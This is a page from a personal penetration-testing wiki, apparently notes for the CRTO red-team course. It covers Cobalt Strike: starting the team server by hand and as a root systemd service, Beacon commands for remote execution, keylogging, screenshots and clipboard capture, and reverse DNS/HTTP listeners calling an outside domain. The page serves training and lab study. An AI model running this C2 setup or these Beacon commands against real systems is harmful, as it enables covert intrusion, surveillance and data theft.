Awesome Hackpuntes
  • Intro
  • My CVE
  • Exploit-DB
    • XMLBlueprint <= 16.191112 - XML External Entity Injection
    • Easy XML Editor <= 1.7.8 - XML External Entity Injection
    • winrar 5.80 64bit - Denial of Service
    • rConfig 3.9.2 - Remote Code Execution
    • XML Notepad 2.8.0.4 - XML External Entity Injection
    • IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path
  • OWASP - EN
    • OWASP: Testing guide checklist
  • OWASP - ES
    • [INFO] RECOPILACIÓN DE INFORMACIÓN
    • [CONFIG] GESTIÓN DE CONFIGURACIÓN E IMPLEMENTACIÓN
    • OWASP: Guía de pruebas
  • Page 1
  • 🕵️OSEP Cheatsheet
    • Checklist
    • Online Tools
    • AV Evasion
    • File transfer
    • Exfiltrate Data
    • Interesting files
    • Network Forwarding
    • Tools
    • CRTO Cheat Sheet
    • Page
    • Page 3
    • Page 4
  • 📱Mobile Pentesting
  • 🤖Android
    • Page 2
  • 💸iOS
    • How to extract IPA from iOS device
Powered by GitBook
On this page

Was this helpful?

  1. OSEP Cheatsheet

CRTO Cheat Sheet

Cobalt Strike

Team Server

From terminal

sudo ./teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile # Use TMUX

As a Service

sudo nano /etc/systemd/system/teamserver.service
[Unit]
Description=Cobalt Strike Team Server
After=network.target
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
WorkingDirectory=/home/attacker/cobaltstrike
ExecStart=/home/attacker/cobaltstrike/teamserver 10.10.5.50 Passw0rd! c2-profiles/normal/webbug.profile

[Install]
WantedBy=multi-user.target
sudo systemctl daemon-reload
sudo systemctl status teamserver.service
sudo systemctl start teamserver.service
sudo systemctl stop teamserver.service
sudo systemctl enable teamserver.service
sudo systemctl disable teamserver.service

Beacon

# Basic
sleep <seconds> <jitter> # sleep 5 50
connect <target>
execute-assembly <path-tool> <params-tool> # Execute binary on remote Beacon
run netstat -anop tcp # View listening ports
jobs
jobkill <jib>

# Recon
net logons

clipboard
keylogger 
printscreen
screenshot
screenwatch

# DNS Beacon
checkin # Get metadata/info Beacon

Listeners

name
payload
host
port
bindto
beacons
profile

dns

windows/beacon_dns/reverse_dns_txt

pics.nickelviper.com

53

pics.nickelviper.com

default

http

windows/beacon_http/reverse_http

nickelviper.com

80

nickelviper.com

default

smb

windows/beacon_bind_pipe

TSVCPIPE-8ff80863-eb68-48ad-b397-34ae76d3577e (cambiar 4 últimos)

tcp

windows/beacon_bind_tcp

4444

0.0.0.0

tcp-local

windows/beacon_bind_tcp

4444

127.0.0.1

PreviousToolsNextPage

Last updated 1 year ago

Was this helpful?

🕵️
Page cover image